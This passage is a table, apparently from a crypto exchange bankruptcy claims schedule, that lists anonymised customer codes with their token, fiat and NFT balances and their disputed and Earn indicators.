| 07380414 | | CUSDT[13], TRX[2], USD[57.45] | | |
| 07380415 | | BRZ[1], CUSDT[3], TRX[1], USD[0.01] | | |
| 07380416 | | USD[10.00] | | |
| 07380417 | | USD[10.00] | | |
| 07380418 | | USD[10.00] | | |
| 07380419 | | DOGE[2], ETH[.0029368], ETHW[.0029368], TRX[386.61522622], USD[0.00] | | |
| 07380420 | | USD[10.00] | | |
| 07380421 | | DOGE[166.02346409], USD[0.00] | | |
| 07380423 | | USD[10.00] | | |
| 07380425 | | CUSDT[3], DOGE[2508.67989602], USD[0.00] | | |
| 07380426 | | DOGE[1], USD[0.00] | | |
| 07380427 | | USD[10.00] | | |
| 07380428 | | BRZ[3], CUSDT[5094.65843051], DOGE[1853.3599687], GRT[69.00117616], LINK[3.42315656], MATIC[56.66608024], SHIB[1506222.65865917], SOL[5.79830611], SUSHI[16.0643425], TRX[2945.59929916], USD[0.00] | Yes | |
| 07380429 | | CUSDT[1], USD[0.01] | | |
| 07380430 | | USD[10.00] | | |
| 07380431 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380432 | | BRZ[1], BTC[0], CUSDT[5], DOGE[0], USD[0.00], USDT[1] | | |
| 07380433 | | BTC[.00056845], DOGE[317.54660244], LTC[.0479148], USD[0.00] | | |
| 07380435 | | USD[10.00] | | |
| 07380436 | | USD[10.00] | | |
| 07380437 | | BAT[1], BRZ[1], CUSDT[1], DOGE[116.65189591], TRX[1], USD[0.01] | | |
| 07380438 | | BTC[0], CUSDT[15.6752433], TRX[1.73068389], USD[0.04] | Yes | |
| 07380439 | | USD[10.84] | Yes | |
| 07380440 | | USD[0.00] | | |
| 07380441 | | USD[10.00] | | |
| 07380443 | | DOGE[0.00277919], USD[0.00] | | |
| 07380444 | | USD[0.00] | | |
| 07380445 | | BAT[.144], BTC[.00022395], DOGE[.244], GRT[499.448], LTC[.0088], SUSHI[.128], TRX[3859.232], UNI[.0036], USD[0.05] | | |
| 07380446 | | DOGE[.0087723], USD[0.00] | | |
| 07380447 | | USD[10.00] | | |
| 07380448 | | DOGE[53.30445666], USD[0.00] | Yes | |
| 07380449 | | USD[0.01] | | |
| 07380450 | | TRX[1], USD[0.00] | | |
| 07380451 | | USD[10.00] | | |
| 07380452 | | USD[10.00] | | |
| 07380453 | | DOGE[2000.00590000], ETH[0.24238380], ETHW[0], LTC[2.85900669], USD[0.00] | | |
| 07380454 | | CUSDT[1], USD[0.00] | | |
| 07380455 | | USD[10.00] | | |
| 07380456 | | USD[10.00] | | |
| 07380457 | | BCH[.00015567], BTC[.0000021], CUSDT[1], ETH[.00026617], ETHW[.00026617], KSHIB[1.11101297], LINK[.00419302], MKR[.0000344], PAXG[.00027069], SHIB[91095.24071042], SOL[.2601274], SUSHI[.01233225], TRX[5.44026203], UNI[.00301196], USD[0.01], YFI[.00000274] | Yes | |
| 07380458 | | USD[10.00] | | |
| 07380459 | | USD[0.00] | | |
| 07380460 | | CUSDT[1], DOGE[.00505301], USD[0.00] | Yes | |
| 07380461 | | USD[10.00] | | |
| 07380462 | | BTC[0], GBP[0.00], LTC[0], USD[0.00], USDT[.00000003] | | |
| 07380463 | | USD[10.00] | | |
| 07380464 | | USD[10.00] | | |
| 07380465 | | CUSDT[2], DOGE[.00086403], USD[0.05] | Yes | |
| 07380466 | | USD[10.00] | | |
| 07380467 | | USD[10.00] | | |
| 07380468 | | USD[0.01] | Yes | |
| 07380469 | | SHIB[7952.35723218], USD[4.40] | Yes | |
| 07380470 | | USD[10.00] | | |
| 07380471 | | USD[10.00] | | |
| 07380472 | | CUSDT[2], DOGE[6.19957505], GRT[1.00487695], USD[0.00], USDT[2.21133171] | Yes | |
| 07380473 | | USD[0.00] | | |
| 07380476 | | USD[0.00] | | |
| 07380479 | | USD[10.00] | | |
| 07380480 | | BRZ[1], DOGE[2335.94189438], TRX[2], USD[0.00] | Yes | |
| 07380481 | | DOGE[150.0649565], USD[0.00] | Yes | |
| 07380482 | | CUSDT[6], ETH[.26804741], ETHW[.26785141], SHIB[1], SOL[109.72151033], SUSHI[100.94891012], TRX[7], USD[0.00] | Yes | |
| 07380483 | | USD[10.00] | | |
| 07380484 | | BTC[.00000126], TRX[0], USD[0.00] | | |
| 07380485 | | USD[10.00] | | |
| 07380487 | | USD[0.00] | | |
| 07380488 | | CUSDT[2], DOGE[1.00022983], USD[659.96] | | |
| 07380489 | | DOGE[0], ETH[0.00136668], ETHW[0.00136668], USD[0.00] | | |
| 07380490 | | USD[10.00] | | |
| 07380491 | | AVAX[.00000001], BTC[0], ETH[0.00000074], ETHW[0.00000075], GRT[.088], LINK[0], MATIC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07380492 | | DOGE[122.37601351], USD[0.00] | | |
| 07380493 | | BTC[0], DOGE[0], ETH[0], SHIB[48.4294496], USD[0.00], USDT[0.00000001] | Yes | |
| 07380494 | | USD[10.00] | | |
| 07380497 | | USD[10.00] | | |
| 07380498 | | CUSDT[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380500 | | BRZ[1], CUSDT[2], DOGE[1346.85397413], TRX[1], USD[0.00] | | |
| 07380501 | | ETH[.00283006], ETHW[.00283006], USD[0.00] | | |
| 07380502 | | BRZ[1], CUSDT[2], SHIB[4935939.33047809], TRX[3], USD[0.00] | Yes | |
| 07380505 | | USD[10.00] | | |
| 07380506 | | NFT (388895725290457836/Coachella x FTX Weekend 1 #30642)[1] | | |
| 07380507 | | USD[10.00] | | |
| 07380509 | | USD[0.00] | | |
| 07380510 | | BTC[0.00014905], DOGE[59.16720737], ETH[0.00049030], ETHW[0.00049030], KSHIB[50.79165], LTC[0.01916234], USD[0.00], USDT[0.00053049] | | |
| 07380511 | | USD[10.00] | | |
| 07380512 | | USD[10.00] | | |
| 07380514 | | USD[10.00] | | |
| 07380515 | | USD[0.56], USDT[0] | | |
| 07380516 | | USD[10.00] | | |
| 07380517 | | USD[10.00] | | |
| 07380518 | | USD[10.00] | | |
| 07380519 | | BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], SHIB[0], TRX[1], USD[17.45], USDT[0] | Yes | |
| 07380520 | | DOGE[5995.00000599], USD[10.00] | | |
| 07380522 | | DOGE[137.36469405], USD[0.00] | | |
| 07380523 | | DOGE[17.90948268], USD[5.00] | | |
| 07380524 | | USD[10.00] | | |
| 07380527 | | BTC[.00000087], USD[0.00] | Yes | |
| 07380528 | | USD[10.00] | | |
| 07380529 | | USD[10.00] | | |
| 07380530 | | BRZ[1], CUSDT[2], DOGE[3568.46300715], USD[0.01], USDT[3] | | |
| 07380531 | | BTC[0.06030493], DOGE[21732.01418937], ETH[1.036836], ETHW[1.036836], KSHIB[52132.33795757], USD[0.23] | | |
| 07380532 | | BRZ[1], CUSDT[1], DOGE[2823.87412734], TRX[1], USD[1220.10] | | |
| 07380533 | | BRZ[3], CUSDT[5], DOGE[1], GRT[2], SUSHI[1], TRX[6], USD[0.86], USDT[1] | | |
| 07380534 | | BRZ[1], CUSDT[3], TRX[1], USD[0.00] | | |
| 07380535 | | USD[10.00] | | |
| 07380536 | | BTC[.00008198], ETH[0.00011522], ETHW[0.00011522], GRT[302.697], SHIB[39900.00000001], SOL[.00439], SUSHI[.38611], USD[0.56], USDT[0.59208950] | | |
| 07380537 | | USD[0.00], USDT[0] | | |
| 07380538 | | USD[10.00] | | |
| 07380539 | | USD[10.00] | | |
| 07380541 | | BTC[.00019716], USD[0.00] | | |
| 07380544 | | CUSDT[3], DOGE[2320.06130208], USD[0.00] | Yes | |
| 07380546 | | USD[10.00] | | |
| 07380547 | | USD[10.00] | | |
| 07380551 | | CUSDT[5], DOGE[1], TRX[1], USD[0.00] | | |
| 07380552 | | BRZ[1], BTC[0], DOGE[0], GRT[1.00367791], LINK[1.17617433], SOL[0.00054240], USD[0.00], USDT[0.00000022] | Yes | |
| 07380554 | | CUSDT[1], DOGE[496.72361106], USD[20.00] | | |
| 07380555 | | BRZ[1], CUSDT[1], DOGE[19.14676581], USD[0.00] | | |
| 07380556 | | CUSDT[7], DOGE[687.16332323], TRX[1688.54666535], USD[0.00] | | |
| 07380557 | | CUSDT[2], DOGE[.21707406], USD[0.00] | | |
| 07380559 | | USD[10.00] | | |
| 07380560 | | USD[0.17] | | |
| 07380561 | | USD[10.00] | | |
| 07380563 | | BAT[.00002222], CUSDT[.00000028], DOGE[488.71148079], SOL[2.00164939], TRX[63.35713095], USD[0.04] | Yes | |
| 07380565 | | BAT[1.0165555], BRZ[6.64745358], CUSDT[20], DOGE[5702.24497059], TRX[18.38588797], USD[433.83], USDT[0] | Yes | |
| 07380566 | | LTC[0], USD[0.02] | Yes | |
| 07380567 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07380568 | | DOGE[134.55833446], USD[0.00] | | |
| 07380569 | | USD[0.01] | | |
| 07380570 | | USD[10.00] | | |
| 07380571 | | DOGE[1], USD[0.01] | Yes | |
| 07380575 | | TRX[28239.29954262], USD[2563.60] | Yes | |
| 07380576 | | BTC[0], ETH[.000484], ETHW[.000484], USDT[.8464872] | | |
| 07380578 | | USD[10.00] | | |
| 07380582 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380585 | | SOL[2.79], USD[1.43] | | |
| 07380587 | | USD[10.99] | Yes | |
| 07380588 | | DOGE[1569.84766743], TRX[1], USD[0.00] | | |
| 07380589 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07380591 | | SOL[.06761906], USD[10.39] | Yes | |
| 07380592 | | CUSDT[4], DOGE[2], SOL[0.00001056], TRX[1], USD[0.01] | Yes | |
| 07380593 | | BAT[2.12444841], BRZ[1], CUSDT[2], DOGE[1880.46632655], GRT[.00001861], SHIB[1520280.77705455], USD[0.00], USDT[1.10611955] | Yes | |
| 07380594 | | USD[10.00] | | |
| 07380595 | | USD[10.00] | | |
| 07380596 | | USD[10.00] | | |
| 07380598 | | CUSDT[1], DOGE[610.44399012], TRX[1], USD[0.05] | | |
| 07380599 | | CUSDT[2], DOGE[1], TRX[2], USD[0.01] | Yes | |
| 07380600 | | USD[10.00] | | |
| 07380601 | | DOGE[328.91627324], USD[0.00] | | |
| 07380602 | | CUSDT[19], TRX[5], USD[0.93], USDT[1] | | |
| 07380603 | | BTC[.00021035], USD[21.73] | Yes | |
| 07380604 | | USD[10.00] | | |
| 07380605 | | BAT[3.21043652], BRZ[3], BTC[.00000103], CUSDT[10], DOGE[3], GRT[2.06749595], MATIC[0], NFT (435331808355502901/A Clockwork Door Hinge)[1], NFT (469902415309001817/Samhain Helix)[1], NFT (499025397879955740/Metaverse World Map)[1], NFT (537600259182470369/unko #5)[1], NFT (552352658699237430/Experiencing Displacement)[1], NFT (560889116702128576/Replicator Pods)[1], NFT (569467493002179276/Platonic Topology)[1], SOL[0], SUSHI[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07380606 | | USD[10.89] | Yes | |
| 07380608 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0] | Yes | |
| 07380610 | | BRZ[1], CUSDT[44.68566801], DOGE[340.55686951], TRX[1.49843892], UNI[.00017869], USD[0.00] | | |
| 07380611 | | CUSDT[2], DOGE[155.6009672], ETH[.03106706], ETHW[.03068402], TRX[1], USD[0.01] | Yes | |
| 07380612 | | USD[10.00] | | |
| 07380613 | | CUSDT[1], DOGE[71.68662128], TRX[0.00582275], USD[0.00] | | |
| 07380614 | | USD[10.00] | | |
| 07380615 | | CUSDT[2], DOGE[1220.94451582], SHIB[6206378.60915164], TRX[334.84851417], USD[0.00], USDT[0] | Yes | |
| 07380618 | | USD[0.00] | | |
| 07380619 | | DOGE[1], TRX[238.16173068], USD[0.00] | Yes | |
| 07380620 | | USD[10.00] | | |
| 07380621 | | USD[10.00] | | |
| 07380622 | | USD[10.00] | | |
| 07380624 | | USD[10.00] | | |
| 07380627 | | DOGE[133.83033165], USD[0.00] | Yes | |
| 07380629 | | BTC[0.00000147], DOGE[0], USD[0.00] | | |
| 07380630 | | DOGE[136.89651371], USD[0.00] | | |
| 07380631 | | USD[10.00] | | |
| 07380632 | | TRX[1], USD[0.01] | Yes | |
| 07380633 | | DOGE[1.58266523], TRX[1], USD[0.00] | | |
| 07380635 | | CUSDT[1], DOGE[392.74402388], GRT[71.81261569], TRX[1], USD[0.00] | | |
| 07380636 | | BAT[1], CUSDT[2], ETH[0], ETHW[0], USD[0.00] | | |
| 07380637 | | ETHW[.17460483], SHIB[149213.71213219], USD[0.00], USDT[0] | Yes | |
| 07380639 | | BRZ[1], CUSDT[14], DOGE[1.00336164], USD[0.35] | | |
| 07380641 | | SUSHI[.68983574], USD[0.00] | | |
| 07380642 | | BAT[0], BTC[0.00265803], ETH[0.17271820], ETHW[0.17271820], LINK[10.91445740], TRX[0] | | |
| 07380643 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07380644 | | USD[10.00] | | |
| 07380645 | | BRZ[3], CUSDT[28], DOGE[12.8426468], SHIB[1], SOL[0], TRX[13.43316397], USD[682.73], USDT[0.00000030] | Yes | |
| 07380648 | | USD[10.00] | | |
| 07380649 | | CUSDT[2], DOGE[1138.26450596], USD[0.00] | Yes | |
| 07380650 | | USD[10.00] | | |
| 07380651 | | CUSDT[1], GRT[1], USD[0.00] | | |
| 07380652 | | DOGE[.00000252], SUSHI[.00027937], USD[0.00], USDT[0] | | |
| 07380654 | | USD[10.00] | | |
| 07380655 | | NEAR[0], SHIB[1], TRX[2], USD[0.00], USDT[0.07694478] | | |
| 07380657 | | BRZ[1], CUSDT[1], DOGE[6772.35950359], ETH[.65720991], ETHW[.65720991], TRX[1], USD[0.00] | | |
| 07380658 | | GRT[4.35313274], USD[0.00] | | |
| 07380659 | | ETH[0], USD[0.00], USDT[0.00000463] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380660 | | DOGE[1], TRX[1], USD[100.56] | | |
| 07380661 | | CUSDT[1], GRT[35.44574578], USD[3.32] | Yes | |
| 07380662 | | USD[10.00] | | |
| 07380663 | | USD[10.00] | | |
| 07380664 | | DOGE[29.99875018], USD[0.00] | | |
| 07380667 | | USD[10.00] | | |
| 07380668 | | BRZ[1], BTC[0], DOGE[1.0010979], TRX[.54990602], USD[0.00] | | |
| 07380669 | | DOGE[0], ETH[0.00000001], SHIB[41436.98022765], TRX[0], USD[0.01], USDT[0] | | |
| 07380670 | | USD[10.00] | | |
| 07380671 | | USD[10.00] | | |
| 07380672 | | USD[10.00] | | |
| 07380673 | | BTC[0], ETH[0], USD[0.01] | Yes | |
| 07380674 | | SOL[.3] | | |
| 07380675 | | USD[10.00] | | |
| 07380676 | | USD[10.00] | | |
| 07380677 | | USD[10.00] | | |
| 07380678 | | BTC[.0148487], DOGE[496.963], SHIB[3496500], USD[1002.22] | | |
| 07380679 | | GRT[5.08749991], USD[0.00] | | |
| 07380680 | | CUSDT[10], GRT[41.14189069], SUSHI[2.19384782], TRX[1.09167306], USD[0.00], USDT[0] | Yes | |
| 07380681 | | BAT[1.0165555], BRZ[2], CUSDT[5], DOGE[2.51467518], ETH[.00052208], ETHW[.00052208], GRT[1848.28222287], LINK[.00018583], TRX[6.31457702], USD[1.76], USDT[2.19565417] | Yes | |
| 07380682 | | BTC[0.09000000], USD[0.15] | | |
| 07380683 | Contingent, Disputed | DOGE[368925.471], USD[0.03] | | |
| 07380686 | | USD[10.00] | | |
| 07380687 | | BAT[2.34170175], BRZ[3], CUSDT[6], TRX[1515.30706857], USD[5.84], USDT[0.00000020] | | |
| 07380688 | | CUSDT[2], DOGE[6625.30606532], TRX[1], USD[-200.00] | Yes | |
| 07380689 | | USD[10.00] | | |
| 07380690 | | USD[10.00] | | |
| 07380691 | | USD[0.00] | | |
| 07380692 | | USD[10.00] | | |
| 07380693 | | USD[0.00] | Yes | |
| 07380694 | | USD[10.64] | Yes | |
| 07380695 | | USD[0.00] | | |
| 07380697 | | BTC[.00021343], CUSDT[1], USD[0.00] | | |
| 07380698 | | BRZ[1], CUSDT[6], DOGE[2], TRX[2], USD[0.00] | | |
| 07380699 | | USD[0.00] | | |
| 07380700 | | CUSDT[1], USD[0.01] | | |
| 07380701 | | USD[10.00] | | |
| 07380702 | | BTC[.00042329], DOGE[1], USD[0.00] | | |
| 07380703 | | BTC[.00010697], DOGE[100.78711121], USD[0.00] | Yes | |
| 07380704 | | BTC[.00020855], USD[0.00] | | |
| 07380705 | | CUSDT[1], DOGE[680.98162538], TRX[884.36420192], USD[0.00] | Yes | |
| 07380706 | | USD[10.00] | | |
| 07380708 | | BRZ[1], CUSDT[1], DOGE[1.45556739], USD[0.01] | | |
| 07380710 | | USD[10.00] | | |
| 07380711 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07380712 | | USD[10.00] | | |
| 07380713 | | BAT[1], BRZ[4], CUSDT[7], DAI[.00003657], DOGE[14.08727601], ETH[0.00000914], ETHW[0], GRT[1], KSHIB[0], SHIB[36761.08148782], SUSHI[.00001715], USD[0.01], USDT[3.04798740] | Yes | |
| 07380714 | | DOGE[194.22172715], ETH[.03167749], SOL[3.47508066], TRX[217.42269891], USD[0.19] | | |
| 07380716 | | USD[10.00] | | |
| 07380717 | | USD[10.00] | | |
| 07380719 | | CUSDT[3], ETH[.05179529], ETHW[.05179529], GRT[2], TRX[1], USD[0.01] | | |
| 07380720 | | USD[10.00] | | |
| 07380721 | | USD[0.00] | | |
| 07380722 | | BAT[1], BRZ[5], CUSDT[1], DOGE[1], GRT[1], LINK[1], SHIB[3586617.67595505], SOL[0], SUSHI[0], TRX[4], UNI[1], USD[0.00], USDT[0] | | |
| 07380723 | | SHIB[144980.74549153], USD[0.00] | Yes | |
| 07380724 | | USD[10.00] | | |
| 07380725 | | DOGE[122.74505067], USD[0.00] | | |
| 07380727 | | BRZ[2], CUSDT[3], DOGE[71.35981279], TRX[127.41004762], USD[1.90], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380728 | | USD[10.00] | | |
| 07380729 | | USD[11.06] | Yes | |
| 07380730 | | DOGE[130.97710755], USD[0.00] | | |
| 07380732 | | BAT[1], CUSDT[3], DOGE[4.25857016], TRX[4], USD[0.00] | | |
| 07380733 | | CUSDT[1], TRX[1], UNI[.04123894], USD[0.00] | | |
| 07380734 | | DOGE[122.60420652], USD[0.00] | | |
| 07380735 | | USD[10.00] | | |
| 07380736 | | BTC[.00020577], TRX[1], USD[0.00] | | |
| 07380737 | | USD[10.00] | | |
| 07380738 | | DOGE[1669.17007571], USD[0.00] | | |
| 07380739 | | DOGE[899.91806066], LTC[.14766561], TRX[3], USD[0.01], YFI[.00066023] | | |
| 07380740 | | USD[10.00] | | |
| 07380741 | | USD[10.00] | | |
| 07380742 | | CUSDT[1], TRX[208.36545634], USD[0.00] | | |
| 07380743 | | USD[10.69] | Yes | |
| 07380745 | | BTC[0], USD[0.00] | | |
| 07380746 | | USD[0.00] | | |
| 07380747 | Contingent, Disputed | USD[10.00] | | |
| 07380748 | | USD[10.00] | | |
| 07380749 | | BRZ[2], DOGE[945.93471431], ETH[0], GRT[1], TRX[2], USD[0.00], USDT[0] | | |
| 07380750 | | USD[0.00] | | |
| 07380751 | | CUSDT[6], DOGE[1.8361506], TRX[1], USD[0.00] | Yes | |
| 07380752 | | USD[10.00] | | |
| 07380753 | | TRX[1], USD[0.00] | | |
| 07380754 | | DOGE[32.8984642], USD[0.00] | | |
| 07380755 | | USD[10.00] | | |
| 07380756 | | USD[10.00] | | |
| 07380758 | | DOGE[2], ETH[.04041], ETHW[.04041], USD[0.00] | | |
| 07380759 | | USD[10.00] | | |
| 07380760 | | USD[10.00] | | |
| 07380761 | | USD[10.00] | | |
| 07380762 | | USD[10.00] | | |
| 07380763 | | BTC[.00021632], USD[0.00] | | |
| 07380764 | | DOGE[132.54536], USD[0.00] | | |
| 07380765 | | CUSDT[1], TRX[2], USD[10.00] | | |
| 07380767 | | USD[10.00] | | |
| 07380769 | | USD[110.00] | | |
| 07380770 | | USD[10.00] | | |
| 07380771 | | USD[10.76] | Yes | |
| 07380774 | | TRX[119.48656146], USD[10.00] | | |
| 07380775 | | USD[10.00] | | |
| 07380777 | | USD[10.00] | | |
| 07380778 | | USD[10.00] | | |
| 07380779 | | DOGE[3], USD[0.00] | | |
| 07380780 | | DOGE[156.83691319], LINK[.096], SOL[.996], TRX[239.0264323], USD[0.62] | | |
| 07380781 | | USD[10.00] | | |
| 07380783 | | TRX[1], USD[0.00] | | |
| 07380785 | | USD[10.00] | | |
| 07380786 | | CUSDT[1], DOGE[124.39540722], TRX[1], USD[0.00] | | |
| 07380787 | | USD[10.00] | | |
| 07380788 | | CUSDT[7], TRX[1], USD[60.00] | Yes | |
| 07380789 | | USD[10.00] | | |
| 07380790 | | BTC[.00072666], CUSDT[2], USD[0.01] | | |
| 07380791 | | USD[6.41] | | |
| 07380792 | | DOGE[3.93638168], ETH[.00000001], ETHW[.00000001], SHIB[1], USD[0.01] | Yes | |
| 07380793 | | BRZ[1], USD[0.00], USDT[0] | Yes | |
| 07380794 | | USD[10.00] | | |
| 07380795 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380796 | | USD[10.00] | | |
| 07380797 | | BTC[.00026233], USD[0.00] | | |
| 07380798 | | USD[10.00] | | |
| 07380800 | | TRX[1], USD[0.00] | | |
| 07380801 | | DOGE[122.24133397], USD[0.00] | | |
| 07380802 | | USD[10.00] | | |
| 07380803 | | DOGE[128.34642169], TRX[1], USD[0.00], USDT[0] | | |
| 07380804 | | DOGE[58.62887603], USD[10.00] | | |
| 07380805 | | DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07380806 | | BRZ[1], CUSDT[3], DOGE[1], TRX[1], USD[0.01], USDT[29.57174075] | | |
| 07380807 | | BRZ[1], BTC[.24603986], CUSDT[4], DOGE[13190.55408389], LINK[101.82771217], LTC[1.05925742], SHIB[726470.74668864], USD[2999.00], USDT[2] | | |
| 07380808 | | USD[10.00] | | |
| 07380809 | | USD[0.00] | | |
| 07380810 | | BRZ[1], CUSDT[5], TRX[3], USD[0.00] | | |
| 07380811 | | USD[10.00] | | |
| 07380812 | | BRZ[0.00179522], BTC[0], CUSDT[1], DOGE[2], LINK[0], LTC[0], TRX[1], USD[0.00], USDT[0.00044870] | | |
| 07380816 | | USD[0.00] | Yes | |
| 07380817 | | CUSDT[9], DOGE[1019.45323052], NFT [303996320453371452/Barcelona Ticket Stub #1383][1], NFT [520422685416731801/Bahrain Ticket Stub #332][1], NFT [552487991525084275/Entrance Voucher #3778][1], SHIB[2], TRX[7954.16861588], USD[0.00] | Yes | |
| 07380818 | | ETH[0], SOL[.00000001], USDT[0.46838122] | | |
| 07380819 | | USD[10.00] | | |
| 07380820 | | BRZ[1], CUSDT[4806.64516865], DOGE[1], TRX[2108.03189524], USD[0.00] | | |
| 07380821 | | BTC[.01418325], CUSDT[2], DOGE[9683.48390301], TRX[3], USD[233.15] | Yes | |
| 07380822 | | DOGE[1.00008488], USD[0.01] | | |
| 07380823 | | AUD[0.00], BCH[0], BTC[0], DOGE[1], TRX[1], USD[0.01] | | |
| 07380824 | | BTC[0], DOGE[296.11442142], USD[0.00] | | |
| 07380825 | | USD[10.00] | | |
| 07380826 | | USD[10.00] | | |
| 07380827 | | CUSDT[1], DOGE[11.41139100], SUSHI[0], USD[0.00] | | |
| 07380828 | | CUSDT[26], TRX[3], USD[0.00] | | |
| 07380830 | | USD[10.00] | | |
| 07380831 | | TRX[1], USD[0.00] | | |
| 07380832 | | DOGE[73.81527161], KSHIB[116.69639698], LTC[.02392302], SHIB[.00000765], USD[0.00] | Yes | |
| 07380834 | | USD[10.00] | | |
| 07380835 | | USD[10.00] | | |
| 07380837 | | CUSDT[1], DOGE[4], TRX[1], USD[0.00] | | |
| 07380838 | | BTC[.00021473], USD[0.00] | | |
| 07380841 | | USD[0.00] | | |
| 07380842 | | BTC[0.00000449], SOL[.00011659], USD[0.00] | | |
| 07380843 | | BRZ[1], CUSDT[1], DOGE[649.67555125], MATIC[54.02554371], USD[11.09] | Yes | |
| 07380846 | | CUSDT[1], GRT[3.73394488], USD[0.00] | | |
| 07380847 | | USD[10.00] | | |
| 07380848 | | CUSDT[4], TRX[2], USD[0.00] | Yes | |
| 07380849 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07380850 | | USD[10.00] | | |
| 07380851 | | USD[10.00] | | |
| 07380852 | | BTC[.0002221], USD[0.00] | Yes | |
| 07380854 | | USD[10.00] | | |
| 07380855 | | DOGE[1], ETH[0], SOL[.71962904], TRX[1], USD[0.00] | Yes | |
| 07380856 | | BAT[0], BCH[0], BRZ[1], BTC[0], CUSDT[10], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07380857 | | USD[10.00] | | |
| 07380858 | | USD[10.00] | | |
| 07380859 | Contingent, Disputed | SOL[3.67538745], USD[0.00], USDT[0.00000044] | | |
| 07380860 | | USD[10.00] | | |
| 07380861 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07380862 | | DOGE[30899.43488254], USD[0.85] | Yes | |
| 07380863 | | CUSDT[4], DOGE[403.51424588], TRX[1], USD[0.00] | | |
| 07380864 | | USD[0.00], USDT[0] | | |
| 07380865 | | BRZ[1], BTC[0], DOGE[0], ETH[0], LTC[0], MATIC[0], SHIB[0], SOL[14.45823117], USD[0.01], USDT[0.00000001] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07380866 | | BCH[.00188834], BTC[.00029151], CUSDT[3.17207627], USD[0.01], USDT[0], YFI[.00001747] | Yes | |
| 07380868 | | USD[10.00] | | |
| 07380869 | | TRX[3], USD[0.00] | | |
| 07380871 | | USD[10.00] | | |
| 07380874 | | USD[10.00] | | |
| 07380875 | | CUSDT[3], DOGE[522.30180965], TRX[1], USD[0.00] | | |
| 07380876 | | DOGE[501.984], TRX[47851.911386], USD[0.02] | | |
| 07380877 | | CUSDT[1], DOGE[148.80410423], USD[0.00] | | |
| 07380878 | | CUSDT[1], DOGE[1], ETH[0], USD[0.00] | | |
| 07380879 | | USD[10.00] | | |
| 07380880 | | USD[10.00] | | |
| 07380881 | | CUSDT[4], DOGE[5], SHIB[1], USD[0.00] | Yes | |
| 07380882 | | CUSDT[2], USD[0.00] | | |
| 07380883 | | BRZ[1], DOGE[1.73246722], ETHW[.33034249], NFT (53890516967867536/Entrance Voucher #3498)[1], SHIB[1], SUSHI[.60563443], TRX[4], UNI[1.10981256], USD[0.00] | Yes | |
| 07380884 | | DOGE[24.85911655], USD[0.00] | | |
| 07380886 | | USD[10.00] | | |
| 07380887 | | BAT[197.42234018], BRZ[1141.03859645], CUSDT[5], DOGE[30.28980217], GRT[67.09642808], TRX[5167.35661391], USD[0.00] | Yes | |
| 07380888 | | USD[10.00] | | |
| 07380889 | | USD[10.00] | | |
| 07380890 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07380891 | | CUSDT[1], DOGE[3], USD[0.00] | | |
| 07380892 | | DOGE[149.17802905], USD[0.00] | | |
| 07380893 | | BAT[4.01523847], USD[0.00] | | |
| 07380894 | | USD[10.00] | | |
| 07380895 | | BAT[.00055911], DOGE[1], USD[0.01] | | |
| 07380896 | | TRX[218.25397691], USD[0.00] | | |
| 07380897 | | BAT[1], BRZ[2], CUSDT[1], DOGE[.43145504], TRX[2], USD[0.74] | | |
| 07380898 | | BAT[1], BRZ[1], CUSDT[4], DOGE[1], TRX[4], USD[0.00], USDT[1] | | |
| 07380900 | | USD[10.00] | | |
| 07380901 | | USD[0.00] | Yes | |
| 07380902 | | BAT[1.0165555], BRZ[1], BTC[.00226013], CUSDT[4], DAI[78.29476688], DOGE[1064.85383777], ETH[.0295995], ETHW[.02923014], GRT[10.49020127], LTC[3.01537676], SHIB[3063653.41328533], SOL[21.65783595], SUSHI[4.83412586], TRX[819.80430914], USD[288.69] | Yes | |
| 07380903 | | CUSDT[2], DOGE[.00000966], USD[0.00] | | |
| 07380904 | | USD[10.00] | | |
| 07380905 | | BAT[1.0110142], CUSDT[4], DOGE[9189.42224624], GRT[7886.28973267], TRX[6], USD[1629.20], USDT[1.0789372] | Yes | |
| 07380906 | | BTC[.00020577], USD[0.00] | | |
| 07380907 | | CUSDT[2], DOGE[2134.96914141], LTC[4.85891602], TRX[1], USD[0.00], USDT[1] | | |
| 07380909 | | BRZ[1], BTC[0], CUSDT[8], DOGE[0.00003981], GRT[1], TRX[3], USD[0.00] | | |
| 07380910 | | USD[10.00] | | |
